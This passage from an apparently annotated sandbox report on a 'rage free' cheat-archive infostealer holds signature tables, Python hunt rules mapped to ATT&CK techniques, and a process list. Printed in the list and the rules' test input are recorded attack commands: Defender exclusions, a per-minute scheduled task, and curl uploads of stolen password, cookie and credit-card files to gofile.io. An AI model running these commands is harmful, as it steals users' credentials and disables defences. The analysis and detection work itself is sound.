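    r"Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A",
    r"Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A",
    r"Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A",
]

if __name__ == "__main__":
    for proc, risky, outside in rank(SAMPLE_ROWS):
        where = "NON-SYSTEM" if outside else "system dir"
        print(f"{where:<10} {proc}")
        for p in risky:
            print(f"             {p}: {HIGH_RISK[p]}")
```

On the rows above this lists the four dropped binaries first, then WMIC.exe with its two high-risk privileges, then 7-Zip and tasklist. Processes that appear under several paths (the report has both Desktop\rage free\Injector.exe and AppData\Roaming\injector.exe) are kept separate on purpose, since the path is part of what makes a row suspicious.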

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A (4 identical rows collapsed)
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (60 identical rows collapsed)

Note: every hit in this table comes from the sandbox's own 7-Zip file manager and Edge windows, not from any dropped binary. FindShellTrayWindow is routine taskbar interaction for GUI applications, so this signature adds nothing to the verdict on the sample.

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (64 identical rows collapsed)

Note: msedge.exe only; like FindShellTrayWindow, this is ordinary browser UI message traffic and is not attributable to the sample.

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\Desktop\VANTA\x64\Release\GeforceNOW.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4784 wrote to memory of 4548 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe (2 identical rows collapsed)
PID 3388 wrote to memory of 2460 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (2 identical rows collapsed)
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (40 identical rows collapsed)
PID 3388 wrote to memory of 5068 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (2 identical rows collapsed)
PID 3388 wrote to memory of 4032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (18 identical rows collapsed)

Note: the cmd.exe (4784) write into 7zFM.exe (4548) is the sandbox's own launch of the archive (cmd /c "...\rage free.rar" under Processes) creating its child process, and the msedge.exe (3388) writes into 2460/2392/5068/4032 are Chromium's normal parent-to-child process bootstrap. This table records no memory writes by Injector.exe, injector.exe, creal.exe, Nothere.exe or Windowshalper(legit).exe; the signature is harness and browser noise here, not injection by the sample.

Uses Task Scheduler COM API

persistence
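
Hunt rules for the process records in the Processes section, added here as an editor's example and not taken from the sandbox report. The Processes section records Add-MpPreference exclusions for Nothere.exe and Windowshalper(legit).exe, a schtasks task that re-runs Windowshalper(legit).exe every minute at highest run level, curl multipart uploads of cr*.txt files from %Temp% to store10.gofile.io and store2.gofile.io, a binary executed out of C:\Windows\SoftwareDistribution\Download, and tasklist process discovery. The Python below turns each of those into a regex rule over process command lines, runs the rules against lines copied verbatim from the Processes section (plus two benign lines from the same list that must not fire), and extracts the upload file/host inventory from the curl lines. The rule names, the regexes and the ATT&CK technique mapping are the author's own assumptions, not the report's.

```python
"""Hunt rules for the tradecraft recorded in this report's Processes section.

Editor's example, not code from the sandbox report. Rule names, regexes and
the ATT&CK technique IDs are the author's own mapping.
"""
import re
from urllib.parse import urlparse

# Command lines copied verbatim from the Processes section of this report.
# The last two (7-Zip opening the archive, cmd /c color 9) are benign and
# must not trip any rule.
SAMPLE_CMDLINES = r'''
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Nothere.exe'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Nothere.exe'
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windowshalper(legit)" /tr "C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe"
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store10.gofile.io/uploadFile
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store2.gofile.io/uploadFile
"C:\Windows\SoftwareDistribution\Download\qOTtu.exe"
tasklist
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\rage free.rar"
C:\Windows\system32\cmd.exe /c color 9
'''.strip().splitlines()

# (rule name, ATT&CK technique, pattern); case-insensitive because Windows is.
RULES = [
    # Defender exclusion added from the command line (Impair Defenses).
    ("defender_exclusion", "T1562.001",
     re.compile(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension|IpAddress)", re.I)),
    # Scheduled task re-running a binary every N minutes (Scheduled Task).
    ("schtasks_minute_persistence", "T1053.005",
     re.compile(r"schtasks(\.exe)?\"?\s+/create\b.*/sc\s+minute", re.I)),
    # curl multipart file upload (Exfiltration to Cloud Storage).
    ("curl_form_upload", "T1567.002",
     re.compile(r"\bcurl(\.exe)?\b.*\s-F\s+\"?file=@", re.I)),
    # Executable launched out of the Windows Update download cache
    # (Masquerading: legitimate location).
    ("exec_from_softwaredistribution", "T1036.005",
     re.compile(r"\\SoftwareDistribution\\Download\\[^\\]+\.exe", re.I)),
    # Process listing (Process Discovery).
    ("process_discovery_tasklist", "T1057",
     re.compile(r"(^|[\s\"])tasklist(\.exe)?\b", re.I)),
]

# Pulls (local file, upload URL) out of a curl -F "file=@..." <url> line.
UPLOAD_RE = re.compile(r"-F\s+\"?file=@([^\"\s]+)\"?\s+(https?://[^\s\"]+)", re.I)


def classify(cmdline):
    """Return [(rule, technique), ...] for every rule the command line trips."""
    return [(name, tid) for name, tid, rx in RULES if rx.search(cmdline)]


def hunt(cmdlines):
    """Group command lines by the rule they tripped; clean lines are dropped."""
    hits = {}
    for line in cmdlines:
        for name, _ in classify(line):
            hits.setdefault(name, []).append(line)
    return hits


def exfil_pairs(cmdlines):
    """(local file, upload URL) for each curl upload: the exfiltration inventory."""
    pairs = []
    for line in cmdlines:
        m = UPLOAD_RE.search(line)
        if m:
            pairs.append((m.group(1), m.group(2)))
    return pairs


def exfil_hosts(cmdlines):
    """Sorted unique upload hosts, i.e. the egress block / DNS hunt list."""
    return sorted({urlparse(url).hostname for _, url in exfil_pairs(cmdlines)})


def techniques(cmdlines):
    """Sorted unique ATT&CK IDs observed across all command lines."""
    return sorted({tid for line in cmdlines for _, tid in classify(line)})


if __name__ == "__main__":
    for rule, lines in hunt(SAMPLE_CMDLINES).items():
        print(f"[{rule}] {len(lines)} hit(s)")
        for line in lines:
            print("    " + line[:110])
    print("exfil hosts:", exfil_hosts(SAMPLE_CMDLINES))
    print("techniques:", techniques(SAMPLE_CMDLINES))
```

To use it on a live host, replace SAMPLE_CMDLINES with the command-line column from Sysmon Event ID 1 or Security event 4688 (with process command-line auditing enabled). The curl rule fires on the cmd.exe /c wrapper as well as the child curl.exe, so one upload shows up twice in the full process list; de-duplicate on the (file, URL) pairs from exfil_pairs rather than on raw hits.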

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\rage free.rar"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\rage free.rar"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9747646f8,0x7ff974764708,0x7ff974764718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,5406018157454078344,12857567957249192065,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,5406018157454078344,12857567957249192065,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,5406018157454078344,12857567957249192065,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,5406018157454078344,12857567957249192065,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,5406018157454078344,12857567957249192065,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9747646f8,0x7ff974764708,0x7ff974764718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,15903815262483691332,2292567849885689383,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,15903815262483691332,2292567849885689383,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,15903815262483691332,2292567849885689383,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15903815262483691332,2292567849885689383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15903815262483691332,2292567849885689383,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Desktop\rage free\Injector.exe

"C:\Users\Admin\Desktop\rage free\Injector.exe" "C:\Users\Admin\Desktop\rage free\test.dll"

C:\Users\Admin\AppData\Roaming\injector.exe

"C:\Users\Admin\AppData\Roaming\injector.exe"

C:\Users\Admin\AppData\Roaming\creal.exe

"C:\Users\Admin\AppData\Roaming\creal.exe"

C:\Users\Admin\AppData\Roaming\Nothere.exe

"C:\Users\Admin\AppData\Roaming\Nothere.exe"

C:\Users\Admin\AppData\Roaming\creal.exe

"C:\Users\Admin\AppData\Roaming\creal.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c color 9

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Nothere.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Nothere.exe'

C:\Windows\SoftwareDistribution\Download\qOTtu.exe

"C:\Windows\SoftwareDistribution\Download\qOTtu.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store10.gofile.io/uploadFile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windowshalper(legit).exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store10.gofile.io/uploadFile

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windowshalper(legit)" /tr "C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store10.gofile.io/uploadFile

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\Desktop\rage free\Injector.exe

"C:\Users\Admin\Desktop\rage free\Injector.exe"

C:\Users\Admin\AppData\Roaming\injector.exe

"C:\Users\Admin\AppData\Roaming\injector.exe"

C:\Users\Admin\AppData\Roaming\creal.exe

"C:\Users\Admin\AppData\Roaming\creal.exe"

C:\Users\Admin\AppData\Roaming\Nothere.exe

"C:\Users\Admin\AppData\Roaming\Nothere.exe"

C:\Users\Admin\AppData\Roaming\creal.exe

"C:\Users\Admin\AppData\Roaming\creal.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c color 9

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store2.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store2.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store2.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store2.gofile.io/uploadFile

C:\Windows\SoftwareDistribution\Download\q8q5y.exe

"C:\Windows\SoftwareDistribution\Download\q8q5y.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store2.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store2.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store2.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store2.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store2.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store2.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store2.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store2.gofile.io/uploadFile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9747646f8,0x7ff974764708,0x7ff974764718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4516 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5480 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5484 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3884 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

